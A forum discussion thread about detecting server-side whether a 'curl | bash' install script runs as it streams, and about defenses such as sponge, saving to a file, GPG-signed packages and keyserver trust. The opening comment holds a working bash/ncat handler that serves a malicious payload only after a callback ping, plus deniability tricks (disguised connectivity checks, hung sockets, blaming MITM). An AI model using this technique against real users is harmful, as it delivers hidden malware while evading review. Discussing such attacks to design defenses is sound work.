The sleep cleverness is excessive though - what you really want to know is whether the script you're returning is being executed as it's sent. If it is, you can be pretty confident that a human isn't reading it line by line.
1. Send your response as transfer-encoding: chunked and tcp_nodelay
2. Send the first command as
curl www.example.com/$unique_id
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.
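Sketched out, the server side could look something like this (a rough sketch only, not anything from the article: it leans on ncat's --sh-exec to hand each connection to a shell handler, and the /ping/ path, port, and the payload_*.sh files are all invented; payloads are assumed to be plain ASCII and non-empty):

    #!/usr/bin/env bash
    # handler.sh -- run as:  ncat -l -k 8080 --sh-exec ./handler.sh
    # ncat connects each incoming socket to this script's stdin/stdout.
    export LC_ALL=C                        # make ${#...} count bytes

    read -r method path _                  # request line, e.g. "GET /setup HTTP/1.1"
    while read -r h; do [ -z "${h%$'\r'}" ] && break; done    # skip the headers
    mkdir -p pings

    if [ "${path#/ping/}" != "$path" ]; then      # the phone-home from the streamed script
      touch "pings/${path#/ping/}"
      printf 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n'
      exit 0
    fi

    chunk() { printf '%x\r\n%s\r\n' "${#1}" "$1"; }    # emit one HTTP/1.1 chunk

    id=$RANDOM$RANDOM
    printf 'HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n'

    # First command of the "installer": an innocuous-looking callback.
    chunk "curl -s http://www.example.com:8080/ping/$id >/dev/null"$'\n'
    sleep 1                                # give a streaming bash time to run it

    if [ -e "pings/$id" ]; then
      chunk "$(cat payload_malicious.sh)"  # our output is being executed as it arrives
    else
      chunk "$(cat payload_innocent.sh)"   # a human may be reading this instead
    fi
    printf '0\r\n\r\n'                     # terminating chunk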
For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.
You could even get more clever with this: drop the unique_id and just match up the remote host IP. You could probably even disguise the command as something like a "network connectivity test" in the script:
# Check network connectivity so we can continue the install
if ! curl --fail www.example.com; then exit; fi
Of course, what's actually happening is that we've just signaled the server that it can now serve our malicious code.
Remote host IP isn't ideal because of NAT (request from another host on the network exposes your malfeasance), or if your target may be using something like TOR (two requests might have differing remote IPs). But there's a bunch of tricks to get unique info out of a network request that you control the parameters to. Presumably there aren't that many concurrent invocations of your script, so only a few bits of entropy are actually required. Best way is probably to have a bunch of domains and make it look like they're various mirrors you're downloading binaries from - then it's not suspicious that it changes for different machines or requests.
If binaries are being downloaded, then the dynamically generated malicious script could pretend it's a checksum when really it's a unique tracking URL.
Well it's okay to not infect every target. In fact, if you are being malicious, it would be better to only infect some targets so as to muddy the waters when someone is trying to investigate your actions after the fact.
You can claim that you were MITM'd and point to the non-infectious cases as evidence that you always send a good payload.
note that `echo echo hi` is fully read, and then (and only then) passed to bash.
ditto for
bash -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.
It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could -- it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.
You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.
I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.
I disagree. Maybe a new tool that downloads and then runs a script from the interwebs needs to be written, but curl itself does one job and does it well.
Yet Another Package Manager :) Seriously - you're right, but people use curl | bash because it's super simple/fast and usually just works. Package managers can be an intimidating mess; even the choices we have in package managers confound things these days - did I install that with apt? snap? npm? pip? aw, crap, that program I just installed with pip isn't working because I'd already installed a version with apt and some of its configuration isn't compatible!!!
It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.
[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.
Hm. I tried and it does not seem to work. You can view my attempt at https://github.com/sethgrid/exploit. Chances are that I am ignorant of something. If someone knows what I am doing wrong, please let me know!
The code starts to send chunked data and polls for a return curl call from the downloaded script. If the script's curl call calls home, the download will chunk out "bad" bash.
What I see happening is the downloaded script does not fully run until fully downloaded.
Fooling a human with bash is less difficult than you might imagine. I am fooled by bash code at least half the time I interact with a shell script I didn't write myself. A misleading comment plus an innocuous looking URL, coupled with the fact that an installation script can be expected to download files from the internet in order to install them would make this slip past nearly any reviewer.
On the evading detection side, one other simple way to avoid this is to add sponge[0] between curl and bash in the pipeline, i.e. curl ... | sponge | bash. sponge consumes all input until EOF before outputting anything, stopping bash from executing a partially downloaded script.
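Concretely (sponge comes from moreutils; the command-substitution form mentioned upthread behaves similarly, since $(...) is read to EOF before bash -c runs anything; the URL is a placeholder):

    curl -fsSL https://example.com/setup | sponge | bash   # buffer the entire script first
    bash -c "$(curl -fsSL https://example.com/setup)"      # rough equivalent without sponge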
Just curl it to tee or redirect to a file and you know it won't change before you execute the script file.
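For example (the URL is a placeholder):

    curl -fsSL https://example.com/setup -o setup.sh   # or: curl ... | tee setup.sh
    less setup.sh                                      # inspect the exact bytes you saved
    bash setup.sh                                      # run precisely what you just read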
There's nothing stopping somebody from even more trivially just sending each IP a benign script once (per curl user agent) and a malicious script the second time. Putting it in a file and executing the file brings it entirely into your domain of control.
So yes, curl bash can be dangerous. But it's just so darn convenient. And when it's coming from a very prominent trusted source like Get Pip or Amazon AWS, it's hard not to just go with it.
Surely there's some compromise middle ground? Let me download "safe-curl-bash" (scb) that only runs a script if it's trusted in some manner? Maybe if its checksum matches one in a crowdsourced database.
"Sorry only 9 people have declared this script valid and your threshold is 100. Here's a cat of the script and we will ask you if it looks valid or not or don't know."
I also think it's a bit more realistic than the "anyone who does this should be reading the script first to check that it's safe" approach. Yes, and I check the passenger jet for flaws before I board, too!
> Yes, and I check the passenger jet for flaws before I board, too!
There is an entire infrastructure of people and processes in place to make sure that you don't have to check your passenger jet for flaws to be reasonably sure it's safe. No such infrastructure exists to protect you from the consequences of curl-bashing software off some random Web site.
No matter what, you're putting 100% faith in the server and the TLS connection. There are a lot of reasons to prefer packages, but I don't think security is one of them.
When RPM-GPG-EXAMPLE and example.rpm are both coming from https://example.com it's less clear. When example.rpm is coming from a mirror repository, or being emailed around (yes, this happens), package signing asserts that example.rpm was signed by the key in RPM-GPG-EXAMPLE, which has a strong (but not bullet-proof) connection to being built by example.com.
From that example, we can see that package signing also protects from someone who's able to break into the main example.com webserver but not example.com's build system - if the attackers did not get into the build system and example.rpm has a valid signature, then despite the webserver being broken, the rpm file can still be trusted, assuming the webserver did not have a copy of the private key used for build signing. If we loaded https://example.com/RPM-GPG-EXAMPLE before the webserver was broken into, and then the webserver was broken into and a malicious RPM-GPG-EXAMPLE and example.rpm were uploaded, it would be noticed. (Examining changes to RPM-GPG-EXAMPLE is, unfortunately, left to the reader as an exercise.)
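In command terms, the check is roughly (file names follow the example above):

    rpm --import RPM-GPG-EXAMPLE    # trust the publisher's public signing key
    rpm --checksig example.rpm      # verify the package carries a valid signature from it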
Still, while it's true that loading the file from https://example.com/RPM-GPG-EXAMPLE relies on TLS, there are methods available to confirm that the file's contents are valid that don't rely on TLS, if the security folk at example.com are doing their job.
Finally, TLS is not an all or nothing game. Or rather, the certificate used to sign the https connection does not have to be blindly trusted, and in the case of sketchy root certificates, even if https://example.com loads fine in a web browser, it does not mean it should necessarily be trusted. Certificate Transparency (eg crt.sh) is a proper lever when working with example.com.
Security is complicated and there are no silver bullets.
Say I already trust packages.redhat.com and install rpms regularly from it. I likely already have trusted their key.
Now packages.redhat.com gets hacked. Unless the hacker also stole the private key used for signing packages, I will get a warning/error while installing the replaced RPMs (which I admit most users will ignore) - but a curl|bash kinda defeats the point of package signing too.
Who are these "most people"? I've never seen curl | bash outside of developer circles. "Most" people install things directly from the app store, or use web apps.
Good use case for IPFS. You could curl a hash and check that hash against signatures committed to a blockchain. If a set of signatures that you trust exists, then it's golden; if not, no exec.
Security and convenience are almost always a difficult tradeoff. In the case of curl'ing scripts from trusted websites, what is the benefit for the average lazy user? Are you using an OS that doesn't have a signed package with the same library/program?
It's not trust now that you need to worry about. It's trust later, when curl-bash is part of an automated pipeline that no one pays attention to.
Your solution depends on third parties checking the script or going based on some knowledge of "trusted sources." That has nothing to do with this hack, which exploits those who are "verifying" the script themselves before executing it.
The simple solution here is not to use curl/execute with a pipe. Just wget to save the file and check it locally (rather than through a browser) before executing.
I think the Arch user repo does this correctly by asking, "do you want to edit the PKGBUILD?" You can just press n to accept defaults, or y to take a look under the hood and make edits before continuing.
Preventing the bad guy from "validating" his own script a million times is difficult. At the end of the day, I think security basically has to come from "I trust the website that I'm on."
Neat! But it's not obviously a bad idea. You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.
> You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.
This site's argument is that the software publisher can selectively attack users during a live software install, in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact).
I mean, I guess I see them making a three-stage argument:
1) Distributing software via bash script is a bad idea
2) Sensible people review the bash scripts they downloaded before running them
3) But haha! Here is a clever trick that evades that review.
And I'm not persuaded by 3) being interesting because I already rejected 1) and 2), and I consider 3) to just be proving my point -- you (for all values of you!) are not competent to perform a very brief but somehow thorough security review of a shell script that probably has further dependencies you aren't even looking at, and the actual reasoning to apply when deciding to install software this or any way is purely "Do I trust the entity I have this TLS connection open with to run code on my machine?".
I agree with im3w1l's point: if everyone runs the same install script, it's a lot riskier for the publisher to attack everywhere. If people run individualized scripts, it's a lot less risky.
I think there's a difference between trusting an organization's code that is published to the general public, and trusting an organization to send you arbitrary code in a specific moment. Only software distribution methods can enforce this kind of distinction, and curl | bash by itself doesn't, particularly in light of the article's technique.
I tried to discuss this distinction in some of my reproducible builds talks. There's a difference between trusting Debian to publish safe OS packages, and trusting Debian to send you a safe package when you run a package manager if the package could easily be different every time. This is particularly so when someone may be able to compromise the software publisher's infrastructure, or when a government may be able to compel the software publisher to attack one user but not other users.
Instead of your (1) and (2) above, how about this?
1) Distributing software via a method that can single out particular users and groups to receive distinctive versions is a bad idea: it increases the chance that some users will actually be attacked via the software publication system.
2) We might think that curl | bash isn't particularly egregious this way, because there are various ways that publishers might get caught selectively providing malicious versions. This is especially so because the publishers can't tell whether a curl connection is going to run the installer or simply save it to disk. That makes the publishers (or other people who could cause this attack to happen) less likely to do it.
3) But haha! Here is a clever trick that restores the publishers' ability to distinguish between running and saving the installer, and in turn breaks the most plausible ways that publishers could get caught doing this.
Edit: Elsewhere in this thread you suggested that the likeliest alternative is something like
I think I'd agree that this has some of the same problems, although it might have some advantages because of the potential decoupling between the distribution of the signing key and the distribution of the signed package. As another commenter pointed out, you could try to use a different channel to get or verify the key, and some users actually do; also, you'll have a saved copy of the key afterward.
I agree that the distributor having control over offering different artifacts to different individuals is very risky.
I was assuming that the sites that you might `curl | bash` from are third-party sites (i.e. not your Linux distribution) that you don't have an existing trust relationship with, which makes it impossible to avoid this capability. That's the situation people use curl | bash in.
So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.
> you'll have a saved copy of the key afterward
Yes, though since dpkg post-install scripts can modify arbitrary files (right?), you can't trust that any files on your disk are the ones that existed before the compromise. So couldn't the malicious key verify the malicious package, which then overwrites the copy of the package and key on-disk with the good versions that were given to everyone else?
> So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.
I guess we need some other infrastructure or social practice on top in order to compare what different people see, and/or allow the distributor to commit to particular versions. (Then having the distributor not know whether someone is blindly installing a particular file without verification is necessary, but not sufficient, to deter this kind of attack.)
(a compromise of github itself would be needed) - it's easy to imagine one of the many mirrors of Debian suffering a compromise. But as they just push signed debs, the damage would be limited (not trivial; there could conceivably be bugs in apt/dpkg/gnupg etc).
If you are running the same script as everyone else, then there is a good chance someone else will notice if something is off. If everyone is potentially given their own personalized script, then this safety-in-numbers strategy doesn't work.
If you know you are running the standard scripts that everyone runs, then it also makes a post-breach investigation easier. You know the exact scripts you ran, as opposed to knowing "well, I curl | bashed from these sites, so one of them might be bad".
There's nothing stopping people from being served different content with packages. Hell, n users could receive n different packages which all pass the GPG check. And since you're getting your checksum from the same site it would look like it had the right checksum too. You would have to find other people you trust to compare it to but since everything appears to be above board why would you even think to do that?
Either you trust the entity you're downloading software from or you don't.
Linux/BSD distribution mirrors don't control the package signing keys, maintainers do. Similarly, Google doesn't possess the ability to push out updates for third-party apps, without fundamentally redesigning the OS with a platform update, because the signing keys are owned by the app developers, and the existing OS rejects updates signed with different keys. In both of these situations, the key owners lack the ability to selectively push out signed updates, unless they also control the distribution infrastructure.
The argument is predicated on the assumption that some subset of people are checking the installer before running it, whether that installer be a shell script or a binary package.
With the binary packages you don’t have any way to tell if the consumer is going to inspect it or not, so even if you send the malicious code to only a subset of people, there is a risk of detection.
The technique in the post allows you to distribute the malicious code only to people who aren’t inspecting it with a much higher success rate.
Personally I’m dubious that anyone is inspecting any installers with enough expertise and scrutiny to protect the rest of us, so the differences between the install methods in this regard are negligible.
>in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact)
What do you mean? They could `tee` curl output to a file (or elsewhere, for archives). They could also suspend passing the output to bash until they've verified the output (perhaps they would run a hash function and compare the result).
Alice and Bob are both installing something on their computers. It is available as both a .deb and via "curl | bash". It is not malicious...but it does turn out to have a serious bug.
They both install, and both hit the bug and find that it has completely and utterly broken their network configurations bad enough that they have no network access at all.
Alice installed via the .deb. She can look at the scripts in the .deb and see what it was messing with, which gives her a big head start on figuring out how to fix it at least enough to connect to the network backup server and fully restore her network configuration.
Bob installed via "curl | bash". Bob is now left using find to look for recently changed configuration files, and paging through the out of date O'Reilly books he has from the old days when programmers owned physical books, trying to remember enough about network configuration to recognize what is wrong.
Trustworthy sites do not serve you malicious code. They often will, however, serve you buggy code.
The difference is that you can inspect it before you run it if you download it. If you pipe it into bash you don’t know what you’re getting, even if you previously inspected the data provided by that URL.
I don't feel the need to review the source code for every install script I run.
I don't read the source code for almost any of the code on my machine today. In most cases where I see `curl | bash`, I'd probably already be screwed even if I review it. Most install scripts end up doing "hit website, install thing" anyways - am I reviewing the second-stage install script also?
That's a way in which "curl | bash" distributed software is better than .deb/.dmg distributed software, right? Because you have the potential to inspect the script first, if you have some kind of ridiculous confidence in your ability to perform security review of an entire software product in the moments before you decide to install it.
But it's never presented in that way, as a feature. It's presented as a terrible way to distribute software.
It doesn't take ridiculous confidence to analyze shell scripts. In the hundreds of scripts I have read, few were more than 100 lines long. It shouldn't take more than 60 seconds (probably 30 or less) to mentally build a list of all possible operations a short script can perform. Bourne shell scripts don't have much room to hide surprising behavior, and when they do, it immediately stands out. If they are permanently installed, and invoked later by other parts of the system, then they may need more probing, but we're talking about installation scripts.
.deb and .dmg can be easily extracted. The former is just an `ar` archive containing tarballs, which you can (and should) extract to read the install scripts. (.dmg specifics escape me, since I only dealt with them one time, years ago.)
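For instance, with a package file in hand (package.deb is a placeholder):

    dpkg-deb --info package.deb             # control metadata
    dpkg-deb --contents package.deb         # files it would install
    dpkg-deb --control package.deb ./ctrl   # maintainer scripts end up in ./ctrl
    less ./ctrl/postinst                    # what runs as root at install time, if present

    # Or with nothing but binutils/tar, since a .deb is just an ar archive of tarballs:
    ar x package.deb && ls                  # debian-binary, control.tar.*, data.tar.*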
Binary code isn't inscrutable. Some good tools for this are, among many, many more, IDA, Hopper, and radare2. How long this takes depends on what your goals are, how comprehensive you are, and the program complexity. I don't think I've yet spent years on one project, fortunately, but the months-long efforts, for undoing some once-prominent copyright protection systems, were pretty brutal. Smaller programs have taken me just several hours to appropriately examine.
deb/rpm is better because it's usually signed by the maintainer with GPG keys. I think it's harder to steal keys from a maintainer than to infiltrate a web server.
Quote (trying to fit it to a narrow width, for others on mobile):
    curl -s 'https://pgp.mit.edu/pks/lookup?op=get&search=0x1657198823E52A61' |
      gpg --import &&
      if z=$(curl -s 'https://install.zerotier.com/' | gpg); then
        echo "$z" | sudo bash
      fi
It's interesting - it tries to import a given gpg key from keyserver, then grabs a gpg armored text file with a bash header - with the gpg header wrapped in a here-document:
#!/bin/bash
<<ENDOFSIGSTART=
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
ENDOFSIGSTART=
I'm unsure, but I think you could just stick your malicious code before the signature?
So it really isn't any better, as far as I can tell. There's also a trade-off between scripts that can be typed (curl https://i.com.com) and ones that need copy-pasting - as copy-pasting also isn't safe - even if that's a somewhat different attack vector (compromising the web site, altering the js depending on the visitor).
I don't think there are very meaningful differences in the security properties -- I don't think it's more difficult to become compromised by one than by one of the others.
No, you're deliberately choosing a bad way to get a key to try to prove your point. You shouldn't be fetching a key from the site that might be compromised.
> You shouldn't be fetching a key from the site that might be compromised.
You shouldn't, but people do, and are being directed to do so increasingly as Linux becomes more popular. Software developers want to be software publishers so bad that they're just going to keep pushing, and therein lies the risk: If people get the impression that packages are somehow more secure than shell scripts, then these kinds of attacks will simply become more prevalent.
To you it's obvious that packages aren't more secure; it's how you get them that makes their normal use more secure. That's apparently too subtle a point for even big companies like Microsoft.
1. Walled Garden: Developers don't self-publish. Call it an app store, call it everything-in-apt.
2. Encapsulate everything so that developers can't do anything. Don't use anything unless it comes in a docker instance. Or a FreeBSD jail. Or something else. Qubes maybe.
No, there's no effective difference between those examples, apart from maybe post mortem analysis. It's also a poor method of key discovery, as hueving said.
Where do you get the keyserver ID? From the website? You're back to square one, because anyone can upload anything to a keyserver. If they can modify the website (change files, etc) they can also change the keyserver ID they're telling people to use.
The "antipattern" is letting/expecting software developers also be software publishers.
This is a good point, which should be brought up more. Although you probably meant key id or key fingerprint, not keyserver ID, which would imply something else.
You're supposed to do additional verification of PGP keys, either through attending key signing parties (who does that in 2018?), checking the signatures of people you already trust, or comparing as much out-of-band information as you can.
It's not terribly hard to create a plausibly trusted keyring from scratch that depends on only 1 of 3 websites being legitimate. For example:
All keys are cross signed as shown by gpg2 --list-signatures.
If this sounds like a pain in the ass, it's because it is, and GPG could be so much better.
Ironically, if you can't acquire the developer's public signing key, it might be best to install software directly from their website, if no trusted repositories are available. If you can acquire their signing key, it's probably best to not install software directly from their website, in order to avoid selective distribution attacks. Sort of unintuitive.
Public keyservers are well-known, and in a different security domain than the download server. Without breaking in, a rogue party can't delete or replace keys from the keyservers.
Aren't keyserver lookups usually keyed off a 32-bit key ID though? (Whose space isn't big enough to avoid someone brute-force generating a key with a certain key ID s.t. you think you got the right key.) You're supposed to check the fingerprint, but you need to get the fingerprint, and for that you need a secure channel, and you're right back to square one.
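For instance, using the ZeroTier key ID quoted earlier in the thread (the keyserver choice here is arbitrary):

    gpg --keyserver hkps://keyserver.ubuntu.com --recv-keys 23E52A61           # 32-bit short ID: collidable
    gpg --keyserver hkps://keyserver.ubuntu.com --recv-keys 1657198823E52A61   # 64-bit long ID: better
    gpg --fingerprint 1657198823E52A61    # then compare the full fingerprint out of band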
Of course an unsigned key missing from the keyservers still has the advantage that on subsequent installs/updates, the previously downloaded key persists.
And you can keep the initially downloaded key in your CI configs.
dpkg doesn't stop you overwriting system files in a post-install shell script, as far as I know? Which is the way that a malicious package would choose to do it. I don't think dpkg performs any meaningful security review in the way you describe.
Would you like me to craft you a .deb/.rpm which totally trashes your system? Packages can and very often do leverage the ability to run arbitrary scripts but nothing says I can't do serious damage even without that.
Oh, yeah - good luck getting the average layperson or even many sysadmins to inspect this - because very few people actually know how to review scriptlets in an RPM (rpm -qp --scripts package.rpm, isn't this nice and obvious?). Nobody bothers for packages distributed via yum repositories either, because manually downloading packages to review them defeats the purpose, right?
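Something along these lines (the download step assumes the dnf-plugins-core plugin; package names are placeholders):

    rpm -qp --scripts package.rpm       # scriptlets in a package file you already have
    dnf download somepackage            # fetch from a configured repo without installing
    rpm -qp --scripts somepackage-*.rpm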
Yeah, everything is vulnerable at the end of the day - but at least with packages one is less likely to get seriously messed with, just not impervious to it.
That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
Half the problem with `curl | bash` installation is not related to whether or not you trust what you're downloading...
The more important reason why it is a _horrible_ _stupid_ mechanism for software installation is that it is not _repeatable_.
It is well understood that casual .deb .rpm usage requires an equivalent level of trust as downloading anything else off the internet... but they have the added advantage of being _consistent_ _repeatable_ and _mirrorable_... I can copy the entire repository of any version of debian I want to my local file server, and use that to spin up however much infrastructure I want. And the only person I need to rely on after I have fetched the initial packages is myself.
Plenty of those scripts simply detect your operating system and then interact with the system package manager (adding a new repository, updating the package index, then asking the package manager to install it).
I would far prefer that software projects assumed competence in the installer's knowledge of their system's package manager and just listed the specifics... honestly, how hard is it to just say "here is our $gpg key", "here is our $apt_repo_url", "the package name is $foobar"? And let competent system admins take it from there. Most of the time you end up de-composing the scripts into ansible/$sys_automation_tool_of_the_week anyhow.
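For what it's worth, that flow is only a few lines anyway - a sketch with placeholder values ($gpg_key_url, $apt_repo_url, foobar, and "stable main" are all made up; apt-key is deprecated, hence the signed-by keyring):

    curl -fsSL "$gpg_key_url" | gpg --dearmor |
      sudo tee /usr/share/keyrings/foobar.gpg >/dev/null
    echo "deb [signed-by=/usr/share/keyrings/foobar.gpg] $apt_repo_url stable main" |
      sudo tee /etc/apt/sources.list.d/foobar.list >/dev/null
    sudo apt update && sudo apt install foobar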
Because your $apt_repo_url is useless to a yum user.
The package management community needs to stop balkanizing.
How else do you propose releasing software to all Unix-like OSes without learning a half dozen package manager formats and quirks? Only other choice is a container.
Sure, but that's harder to hide. Any user could paste it somewhere where nothing gets executed and then expose the hack attempt. Pipe to bash has the interesting aspect of letting the author inject hacks only to people who are not looking.
Anyway, the use case for my runck utility is scripts such as Dockerfiles or CI automation, where I want to download and run installers and I don't want to repeat the bash boilerplate.
I always read the code first, but many times there's an additional curl | bash inside, and if I check that url there are yet more curl | bash several layers deep, with branches. And they want me to run this as root ...
Regardless of the installation method, it sounds like we need to be running all applications in their own individual virtual machines (e.g. Qubes OS) or within a restricted environment with limited permissions (iOS).
Worse, what happens when I do want the applications to communicate?
An amusing gotcha I found with docker was how do I convince the servers I communicate with from in the container that I am me? Best bet was to map my user into the user on the container, but that was actually ridiculously fraught with trouble. (There is a chance this has since been fixed...)
Qubes OS adopted the "manual authentication" method (of having to confirm everything, such as clipboard copy/paste).
This is probably not quite scalable (not to mention annoying). Maybe there's some way to have a short session token, so that during a work session of a few hours it works without any intervention.
The problem came when I wanted the app to communicate to another on behalf of me. Do I have to constantly reconfigure an openid connection for every app on my machine? (Not the worst of ideas, I suppose...)
> a knowledgable user will most likely check the content first
Really? Are they going to read every line of code and every line of code in every dependency that the install script installs?
The bash detection is clever, but I think it's a solution to a problem that doesn't exist. It's already very easy to hide malicious code in plain sight, so why go to all this trouble to detect if the user is piping to bash?
For example, see how easy it is to publish a fake npm package or a .deb package:
The obsession against shell pipes is so absolutely absurd. You’d download a dmg and drag it to your apps but not shell pipe? You’ll sudo dpkg -i but not a shell pipe?
Can anyone point to a single case of a shell pipe ever being abused ever?
I'd like to point out that the author is not directly discrediting shell pipes.
> a knowledgable user will most likely check the content first
The obvious workaround would be to download with curl, inspect, then run the very same inspected file through bash. This workflow is easier, without necessarily using pipes. Package files can also be inspected before running, and are not directly inspected in the browser.
Trust, on the other hand, is more complicated. Without doing tedious manual inspection, you have to rely on the distributor. In this case public keys help, but they also do not work with the `curl | bash` workflow.
I use curl and bash to launch a script I wrote to install my versioned home files, and this method is worth using. It depends on what you need; in my use case it is really convenient. It is a matter of trust.
You could prevent the detection by wrapping contents in a block, so Bash reads it entirely before evaluating it: `safe_curl() { printf "{\n"; curl "$@"; printf " \n}"; }`
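Used like so (the URL is a placeholder):

    safe_curl() { printf '{\n'; curl -fsSL "$@"; printf '\n}\n'; }
    safe_curl https://example.com/setup | bash   # bash parses the whole { ... } group before running any of it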
The idea is to distinguish between "curl http://x" and "curl http://x | bash", in order to only give malicious content when the user pipes it straight to bash (presumably they aren't looking at the content in this case).